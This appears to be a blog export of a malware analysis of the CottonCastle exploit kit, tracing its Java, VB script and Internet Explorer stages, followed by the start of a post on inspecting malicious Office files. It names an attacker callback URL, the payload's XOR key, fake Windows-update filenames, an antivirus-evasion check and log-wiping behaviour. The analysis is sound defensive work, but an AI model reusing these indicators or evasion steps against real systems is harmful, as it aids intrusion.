<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHMmy2QQvyo-C0l1eLLAoaidm3DiIgtYvSywghJ5Oh7NyAwPf9xjAq-wzFfMkxEaW1LIBERe7roPw7XaoOMVkoPbHWB_kIjZPRWAdRIDecIQh6nuHX9W9nasE-M2eOQzxcejqiMYR9kOJ/s1600/JAR_string_obfuscation_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHMmy2QQvyo-C0l1eLLAoaidm3DiIgtYvSywghJ5Oh7NyAwPf9xjAq-wzFfMkxEaW1LIBERe7roPw7XaoOMVkoPbHWB_kIjZPRWAdRIDecIQh6nuHX9W9nasE-M2eOQzxcejqiMYR9kOJ/s1600/JAR_string_obfuscation_example.PNG" height="18" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Example of obfuscated string values</span></i></div>
<br />
The execution flow is the following:<br />
<ol>
<li>'<span style="color: #3d85c6;">wrapper</span>' initialization</li>
<li>'<span style="color: #3d85c6;">wrapper</span>' decrypts '<span style="color: #3d85c6;">u.dat</span>' file and passes it to '<span style="color: #3d85c6;">javax.script.ScriptEngineManager</span>'</li>
<li>decrypted from '<span style="color: #3d85c6;">u.dat</span>' JavaScript exploits '<span style="color: #3d85c6;">CVE-2013-0422</span>'</li>
<li>'<span style="color: #3d85c6;">wrapper</span>' decrypts '<span style="color: #3d85c6;">p.dat</span>' and loads it as a class file</li>
<li>'<span style="color: #3d85c6;">p.dat</span>' class file gathers passed to JVM parameters, decrypts '<span style="color: #3d85c6;">j.dat</span>' file and passes it to '<span style="color: #3d85c6;">javax.script.ScriptEngineManager</span>'</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' JavaScript collects values of some OS parameters, decrypts and drops the payload stored in '<span style="color: #3d85c6;">d.dat</span>' file</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' JavaScript downloads a VB script and executes it</li>
<li>VB script checks for presence of AV, downloads an executable file, decrypts, stores and executes it</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' JavaScript deletes all the cache and temp files created during the execution</li>
</ol>
<div>
Let's take it from step 6, '<span style="color: #3d85c6;">j.dat</span>' JavaScript decrypts '<span style="color: #3d85c6;">d.dat</span>' file and attempts to save it into the folder specified under '<span style="color: #3d85c6;">allusersprofile</span>' environment variable. The new filename for '<span style="color: #3d85c6;">d.dat</span>' file will be - '<span style="color: #3d85c6;">java.dll</span>'. If the script fails to save the file under '<span style="color: #3d85c6;">allusersprofile</span>' it saves it into the folder specified under '<span style="color: #3d85c6;">temp</span>' environment variable.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwfbAkAO3Z-I8q_pZYh-s57m0FEu6ACzT0RQxja9sWUi62Ynwg-fhvXiwSjslb8Y7-kr_fbPxujA2Pdhub_FRQet7Fi-AFbSYol5Lv6g9ncv7kOJtQA3WWACl0yPz9xUDjAqlDRzJ0Sv0z/s1600/d_dat_handling_method.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwfbAkAO3Z-I8q_pZYh-s57m0FEu6ACzT0RQxja9sWUi62Ynwg-fhvXiwSjslb8Y7-kr_fbPxujA2Pdhub_FRQet7Fi-AFbSYol5Lv6g9ncv7kOJtQA3WWACl0yPz9xUDjAqlDRzJ0Sv0z/s1600/d_dat_handling_method.PNG" height="109" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of '<span style="color: #3d85c6;">j.dat</span>' JavaScript that handles '<span style="color: #3d85c6;">d.dat</span>' file</span></i></div>
<div>
<br /></div>
<div>
After that, the script decrypts the value stored in '<span style="color: #3d85c6;">session</span>' variable that was pre-loaded by '<span style="color: #3d85c6;">p.dat</span>' file. The decrypted value is the URL for an HTML page containing encoded VB script. The page is downloaded and processed by '<span style="color: #3d85c6;">mshta</span>' tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEF49VZobdVxdWGGSy3z2q2QMht66kVDAXBI9-Swv95HFJX6-QilYYLde-2aZNnQGvuOyP9hILUbrgY2pxv2qxuL100SrQik8zSct4wdSjGpLg0lXbjAnIsjNtfe5bt9PAF8t4OyHk9ofL/s1600/encoded_VB_script.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEF49VZobdVxdWGGSy3z2q2QMht66kVDAXBI9-Swv95HFJX6-QilYYLde-2aZNnQGvuOyP9hILUbrgY2pxv2qxuL100SrQik8zSct4wdSjGpLg0lXbjAnIsjNtfe5bt9PAF8t4OyHk9ofL/s1600/encoded_VB_script.PNG" height="113" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of encoded VB script</span></i> </div>
</div>
<br />
VB script is decoded and executed by the following JavaScript:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPnuI2dtCM2135QE1uQ0Ks6okzw2oUugKlrUPPsZ5OtqAL6T5NKzn6plLISQDnYV34kPFwAOgPFX3pWtO7WhE7_I4TSEOTczjEzHSPq8Lkr35CRI2Nj4MZNW2EOsVLrey73cFdPR7uJaAP/s1600/VB_decoding_JS.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPnuI2dtCM2135QE1uQ0Ks6okzw2oUugKlrUPPsZ5OtqAL6T5NKzn6plLISQDnYV34kPFwAOgPFX3pWtO7WhE7_I4TSEOTczjEzHSPq8Lkr35CRI2Nj4MZNW2EOsVLrey73cFdPR7uJaAP/s1600/VB_decoding_JS.PNG" height="219" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JavaScript that decodes and executed embedded VB script</span></i></div>
<br />
List of operations performed by VB script:<br />
<ul>
<li>query list of all running processes</li>
<li>check results of the query against a pre-defined list of processes</li>
<li>callback to a pre-defined URL in the event of blacklisted processes detected</li>
<li>build filename and filepath for malware payload</li>
<li>download, decode and execute the malware payload</li>
<li>callback to a pre-defined URL reporting a success deployment</li>
</ul>
<div>
List of running processes is pulled from '<span style="color: #3d85c6;">WMI service</span>'</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13lYnwdT5O1lK8itUc4Do16cw81RJ80arSQ-oOR-kwE2nwsJtYkt3ZKs2BG0zP0HJqTqMZ5CYbdjDSgsHO4bB87xnYGRLvOoHIWGlksMgr_JWFXNrQhSlvp77EEzeNuTkpb7p5dhQu7zU/s1600/VB_running_processes.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13lYnwdT5O1lK8itUc4Do16cw81RJ80arSQ-oOR-kwE2nwsJtYkt3ZKs2BG0zP0HJqTqMZ5CYbdjDSgsHO4bB87xnYGRLvOoHIWGlksMgr_JWFXNrQhSlvp77EEzeNuTkpb7p5dhQu7zU/s1600/VB_running_processes.PNG" height="26" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of VB script creating the list of running processes</span></i></div>
<div>
<br /></div>
<div>
The generated list is checked against the list of process names belonging to some security products - 38 in total. Each entry on the list is formatted - '<i><span style="color: #3d85c6;">code_letter</span></i><b>:</b><span style="color: #3d85c6;"><i>process_name</i></span><b>,</b>'. <u>NOTE</u>: the list below contains only the product or service names. Filenames corresponding to these services/products were purposely left out.</div>
<div>
<div>
<ul>
<li>AVG Scanning Core Module - Server Part</li>
<li>AVG Watchdog Service</li>
<li>Ad-Aware Antivirus Service</li>
<li>ArcaVir</li>
<li>Avast! Service</li>
<li>Avira Scheduler</li>
<li>BitDefender Agent</li>
<li>BullGuard Behavioural Detection</li>
<li>CA eTrust Antivirus</li>
<li>Comodo Agent Service</li>
<li>Dr. Web</li>
<li>ESET Service</li>
<li>F-Secure Host Process</li>
<li>G DATA Personal Firewall</li>
<li>Ikarus Security Software</li>
<li>Jetico Personal Firewall</li>
<li>K7TotalSecurity Service Manager</li>
<li>Kaspersky Lab</li>
<li>McAfee Service Host</li>
<li>Microsoft Security Client User Interface</li>
<li>Norman Privacy Tools</li>
<li>Norton 360</li>
<li>Norton AV</li>
<li>Norton Internet Security</li>
<li>Omniquad firewall or Dynamic Security Agent or AGuardDogSuite</li>
<li>Outpost Firewall</li>
<li>PC Tools Security Service</li>
<li>PC Tools ThreatFire Service</li>
<li>Panda Software Controler</li>
<li>Rising Antivirus</li>
<li>Solo Antivirus</li>
<li>Solo Scheduler</li>
<li>Sophos Administrator Service</li>
<li>Sophos Anti-Virus</li>
<li>Trend Micro Anti-Malware Solution Platform</li>
<li>TrustPort Antivirus Management Agent</li>
<li>ZoneAlarm ForceField </li>
</ul>
</div>
</div>
<div>
Interestingly enough, only two of the products are actually blacklisted - '<span style="color: #3d85c6;">Norton 360</span>' and '<span style="color: #3d85c6;">Norton Internet Security</span>'. If a blacklisted process is found the script will call to '<span style="color: #3d85c6;">http://bretan.key-updates.pw:4433/forum/posting/</span>' + '<span style="color: #3d85c6;">1000/</span>' + '<span style="color: #3d85c6;"><i>code_letter</i></span>' corresponding to a detected process. Otherwise, it'll proceed with creating the filename for the malware payload.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ9X-3u6UoF0DYJgFzITKaOd3_OsysZEippbVxx_BnFWnmuUtZ-4Ea4R-smkKdQRCvakw4gjbKVxCdPyWR2wwxHGEo-M2igeddblfwz-vFGEkANtK8cUnYwVjg5l7araF5ZRiw2oiLA4XN/s1600/VB_filename_creation.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ9X-3u6UoF0DYJgFzITKaOd3_OsysZEippbVxx_BnFWnmuUtZ-4Ea4R-smkKdQRCvakw4gjbKVxCdPyWR2wwxHGEo-M2igeddblfwz-vFGEkANtK8cUnYwVjg5l7araF5ZRiw2oiLA4XN/s1600/VB_filename_creation.PNG" height="80" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of VB script creating the filename for the malware paylaod</span></i></div>
<div>
<br /></div>
<div>
Another rather strange '<span style="color: #3d85c6;">twist</span>' in here. If you take a look at the screenshot above you'll notice that the name is created based on a condition. '<span style="color: #3d85c6;">ap</span>' variable is evaluated and depending on the result the prefix of the filename is selected. The value '<span style="color: #3d85c6;">a</span>' corresponds to '<span style="color: #3d85c6;">avast! Service</span>'. I'm not quite sure why this product receives a '<span style="color: #3d85c6;">special treatment</span>', but the possible filenames for the malware payload are - '<span style="color: #3d85c6;">Windows-Patch-KB874923-x86.exe</span>' or '<span style="color: #3d85c6;">Windows-KB874923-x86.exe</span>'. The file will be saved to the folder specified under '<span style="color: #3d85c6;">%TMP%</span>' environment variable. Prior being saved to the disk, the file is run through a XOR routine that decrypts it. The decryption key is stored in plain text in the VB script. In this particular sample it is - '<span style="color: #3d85c6;">e2400a24ac76b37cb0adff1dfd022e08</span>'. Once decrypted and saved, it's executed using '<span style="color: #3d85c6;">cmd.exe</span>'. Spawned '<span style="color: #3d85c6;">black screen</span>' will try to calm a worried user down with '<span style="color: #3d85c6;">echo Install Windows Updates</span>'</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjudf9jJACeTqS2mqclCXWvRo0G3emWhQMQQVinuNIqbjbs4_VTJ-uPZOv8fSQYYKB8-nJSwsnxM-gEL7gQ6pR6FIPLGNJZSUsCZtxsm7Pxgc9G8V74gn-JavGvi7kii4dxbAvcA-xYvsYj/s1600/VB_XORing_execution.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjudf9jJACeTqS2mqclCXWvRo0G3emWhQMQQVinuNIqbjbs4_VTJ-uPZOv8fSQYYKB8-nJSwsnxM-gEL7gQ6pR6FIPLGNJZSUsCZtxsm7Pxgc9G8V74gn-JavGvi7kii4dxbAvcA-xYvsYj/s1600/VB_XORing_execution.PNG" height="46" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of VB script that performs decryption and execution</span></i></div>
<div>
<br /></div>
<div>
The last thing the script does is generating the callback URL. The format is the same as per case with blacklisted process except to the middle part - instead of '<span style="color: #3d85c6;">1000/</span>' it uses '<span style="color: #3d85c6;">111/</span>'.</div>
<div>
<br /></div>
<div>
At this stage the control is passed back to '<span style="color: #3d85c6;">j.dat</span>' JavaScript and the very last operation it performs - '<span style="color: #3d85c6;">clean up</span>'.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVExcyBqvWZxLJzdMma0SXPRk9fohqDtO4pYjkch-B3oMsa_v9S6J1tvpeq0V0UEbDOtlfsby5NLK6xpDsSg4WIOzelcspK6FexNp1NolWJQj4WDehFe5FgYR5DdLmH1oamb2TjMOSlhQ6/s1600/JS_cleanup.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVExcyBqvWZxLJzdMma0SXPRk9fohqDtO4pYjkch-B3oMsa_v9S6J1tvpeq0V0UEbDOtlfsby5NLK6xpDsSg4WIOzelcspK6FexNp1NolWJQj4WDehFe5FgYR5DdLmH1oamb2TjMOSlhQ6/s1600/JS_cleanup.PNG" height="45" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript showing the '<span style="color: #3d85c6;">clean up</span>' function</span></i></div>
<div>
<br /></div>
<div>
The script takes a good care cleaning up the '<span style="color: #3d85c6;">leftovers</span>'. In another rather interesting '<span style="color: #3d85c6;">twist</span>', '<span style="color: #3d85c6;">Kaspersky Labs</span>' are getting '<span style="color: #3d85c6;">special treatment</span>' during this process. On top of deleting temporary files created during the overall execution, the script deletes the content of '<span style="color: #3d85c6;">Kaspersky Lab</span>' folder located in '<span style="color: #3d85c6;">%programdata%</span>'(Win Vista+) or '<span style="color: #3d85c6;">%allusersprofile%</span>'(Win XP). '<span style="color: #3d85c6;">Kaspersky Labs</span>' products keep application tracing '<span style="color: #3d85c6;">.LOG</span>' files in this location, so more likely the script is cleaning it out to remove its traces there too.</div>
<div>
<br /></div>
<div>
This would conclude the Java analysis part, so let's sum things up a little bit. I have to admit it was a rather interesting '<span style="color: #3d85c6;">descent</span>' for me. Do not want to sound as if I'm admiring someone with malicious intentions, but as a techie I have to say it's a nicely written piece of code. Use of <a href="http://en.wikipedia.org/wiki/Minification_%28programming%29" rel="nofollow" target="_blank">Minification</a> and 3 different programming languages is actually quite cool. JavaScript in '<span style="color: #3d85c6;">j.dat</span>' was a particularly interesting piece. At some point I even started thinking could this EK be a '<span style="color: #3d85c6;">state sponsored</span>' work, but that would be just silly, right. One thing I was not able to figure out is the purpose of the Windows PE file. It's only 2.5KB in size with 3 really short functions inside. Anyway, the Java part of this EK is fairly complex - detection evasion through encryption, system reconnaissance, support for blacklisting certain processes, clean up procedure. Overall observation is the Java part of '<span style="color: #3d85c6;">CottonCastle EK</span>' focuses more on being undetected rather being successful.</div>
<div>
<br /></div>
<div>
<b><span style="color: #3d85c6;">If you build it, he will come.</span></b></div>
<div>
<br /></div>
<div>
Since this sample doesn't have the '<span style="color: #3d85c6;">Shockwave Flash Player</span>' exploit part(<a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a> has covered this in one of his blog <a href="http://malware.dontneedcoffee.com/2014/06/cve-2014-0515-flash-1300182-and-earlier.html" rel="nofollow" target="_blank">posts</a>), the last component of '<span style="color: #3d85c6;">CottonCastle EK</span>' we have in this sample is the '<span style="color: #3d85c6;">IE</span>' exploit part. As mentioned in the beginning of the post, after collecting some of the values related to the browser environment a GET request is sent to the server. If the server is satisfied with the request it returns an HTML page with a JavaScript that decodes a blob of data stored in one of the variables.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGhXXjZPUklFek5hrRdxadQ_uFjvs9_WQk8tGv8y4TsqI475s9pBnnDqxR58_PrmFH5oRn5T3eoqWITVHTn_na9J7b_Un6VpF73hsSHf30GgNGx_cBYWdKDUofdr9dwAJJdu0LsblGn8A/s1600/data_blob_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGhXXjZPUklFek5hrRdxadQ_uFjvs9_WQk8tGv8y4TsqI475s9pBnnDqxR58_PrmFH5oRn5T3eoqWITVHTn_na9J7b_Un6VpF73hsSHf30GgNGx_cBYWdKDUofdr9dwAJJdu0LsblGn8A/s1600/data_blob_example.PNG" height="88" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Example of the data blob</span></i></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5ybwEj-YSwfQF6Ps8suN5wkTuxLh6CXKEX0m3Bz1wj03XveEW9Nnkin4TRtjjcmDTcA6YpYLKF10UGDR1XC6UAwu7FzZRiEblvARhjr7J87-Po4bejr1Hb3mCIjyWapXjZcnkEN5lewH/s1600/data_blob_decoding_JS.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5ybwEj-YSwfQF6Ps8suN5wkTuxLh6CXKEX0m3Bz1wj03XveEW9Nnkin4TRtjjcmDTcA6YpYLKF10UGDR1XC6UAwu7FzZRiEblvARhjr7J87-Po4bejr1Hb3mCIjyWapXjZcnkEN5lewH/s1600/data_blob_decoding_JS.PNG" height="239" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JavaScript that decodes the data blob</span></i></div>
<div>
<br /></div>
<div>
The result of the decoding is another JavaScript.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtY2vdOZb8phbPvYqHHlRN6zTslXSW2sZR2psPUiB9K20suEH-TmhLG3JC4w2HVcSCrDWxYQeVb5m2x1Y3clbJuv0hlKdTliIJJco3yDEQdSnjjalKKYSJ6z0RH4BDd3zIrhjsM5YalWeg/s1600/VML_exploit.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtY2vdOZb8phbPvYqHHlRN6zTslXSW2sZR2psPUiB9K20suEH-TmhLG3JC4w2HVcSCrDWxYQeVb5m2x1Y3clbJuv0hlKdTliIJJco3yDEQdSnjjalKKYSJ6z0RH4BDd3zIrhjsM5YalWeg/s1600/VML_exploit.PNG" height="134" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of the decoded JavaScript showing indicators of '<span style="color: #3d85c6;">CVE-2013-2551</span>' exploit code</span></i></div>
<div>
<br /></div>
<div>
Thanks to <a href="https://twitter.com/regenpijp1" rel="nofollow" target="_blank">@regenpijp</a> for help identifying the vulnerability this exploit code is targeting - <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551" rel="nofollow" target="_blank">CVE-2013-2551</a>.</div>
<div>
<br />
Additional information on this EK can be found here - <a href="http://malware.dontneedcoffee.com/2014/06/cottoncastle.html">http://malware.dontneedcoffee.com/2014/06/cottoncastle.html</a><br />
<br /></div>
<div>
This concludes '<span style="color: #3d85c6;">CottonCastle EK</span>' analysis. For the information on the delivered payload please see the summary table below.</div>
<div>
<br /></div>
<div>
<br />
<div class="CSSTableGenerator">
<table>
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>Summary Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">CottonCastle Exploit Kit</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2014-06-06</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-06-07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Data source - <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a>.<br />
Intel source - <a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java / Shockwave Flash Player / Internet Explorer</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;">CVE-2013-0422<br />
CVE-2013-2551<br />
CVE-2014-0515</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">Multi redirect chain</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.05</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">RC4 encrypted string values, Java Reflections, Minification</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR extra content:</td>
<td style="background-color: #b8cce4; color: black;">Number of RC4 encrypted files with '.dat' file extension</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">XOR. key - 'e2400a24ac76b37cb0adff1dfd022e08'</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">System Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Static. 'Windows-Patch-KB874923-x86.exe' or 'Windows-KB874923-x86.exe'</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Browser infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">Internet Explorer 7</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>JAR - <a href="https://www.virustotal.com/en/file/7b2fb564a30eb2e7d852879ddb84985b7348429b5a0896b5eeb687455644d2b3/analysis/1402310324/" rel="nofollow" target="_blank">https://www.virustotal.com/</a> (no detection)</pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE(MD5 b619fce7efde0453c06f68565a8bdbb6)
<a href="https://malwr.com/analysis/YjczZWZlOTNjZDFmNGI5NTljMDNiNjA0MzQ0NDJmOGQ/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/c527e21761a66c9666ae547c9714b7ae2690429ce21ddd5fcfa444a0643c5c9e/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;">Java malicious component is implemented with the use of different evasion techniques. Execution is controlled and depends on the values of different system/OS parameters. </td>
</tr>
</tbody></table>
</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-36305224575445467622014-05-30T13:15:00.000+01:002014-05-30T13:15:29.433+01:00Dissecting Tips: OLE and Office Open XML<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
</div>
<br />
<br />
<u>DISCLAIMER:</u> The choice of tools is based on a personal preference. The same results can be achieved using similar set of tools. This is not a step-by-step guide - these are just some tips.<br />
<br />
If you're to try the described below you'll need to have the following skills and tools:<br />
<br />
<b>Skills</b><br />
<ul>
<li>Fair understanding of Object Linking and Embedding (OLE) file structure</li>
<li>Fair understanding of Office Open XML file structure</li>
</ul>
<b>Tools</b><br />
<ul>
<li><a href="http://www.reconstructer.org/code.html" rel="nofollow" target="_blank">OfficeMalScanner</a> - MS Office forensic tool</li>
<li><a href="http://xmlexplorer.codeplex.com/" rel="nofollow" target="_blank">XML Explorer</a> - XML file viewer</li>
<li><a href="http://www.mitec.cz/ssv.html" rel="nofollow" target="_blank">SSViewer</a> - Structured Storage Viewer </li>
<li><a href="http://www.winitor.com/" rel="nofollow" target="_blank">PEStudio</a> - Windows executable file scoring tool (optional)</li>
<li>Text/Hex Editor of your choice</li>
</ul>
<br />
<u>NOTE:</u> The file samples used in this blog post were sourced from phishing emails roaming around at the end of March 2014.<br />
<br />
The fastest way to check if an <a href="http://en.wikipedia.org/wiki/Object_Linking_and_Embedding" rel="nofollow" target="_blank">OLE</a> file has any malicious content embedded is to run it through '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool. There is a couple of option keys to help you do that - '<span style="color: #3d85c6;">scan</span>' and '<span style="color: #3d85c6;">info</span>'. There is also a couple of switches available - '<span style="color: #3d85c6;">brute</span>' and '<span style="color: #3d85c6;">debug</span>' - that can further increase the chances of finding malicious content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY8bjVsCdphSdnmCXplt604rewjl3zhDPPKlhOqcLqhyphenhyphenkSru4ZjBU6gBdNAG908DFymT_Z-PI4OAQJGMZcNi-XXqOH0r1BcUcBIEajSfyx2NaJB0VIRf6Gs1KmE8Rizl-X2Ro8PNbCBdcJ/s1600/OfficeMalScanner_Usage.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY8bjVsCdphSdnmCXplt604rewjl3zhDPPKlhOqcLqhyphenhyphenkSru4ZjBU6gBdNAG908DFymT_Z-PI4OAQJGMZcNi-XXqOH0r1BcUcBIEajSfyx2NaJB0VIRf6Gs1KmE8Rizl-X2Ro8PNbCBdcJ/s1600/OfficeMalScanner_Usage.PNG" height="69" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner usage</i></span></div>
<br />
The screenshots below shows the tool output for a DOC file that was attached to a phishing email. Taking that we do not know what hides inside, it makes sense to analyse the file using both options - '<span style="color: #3d85c6;">scan</span>' option first.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
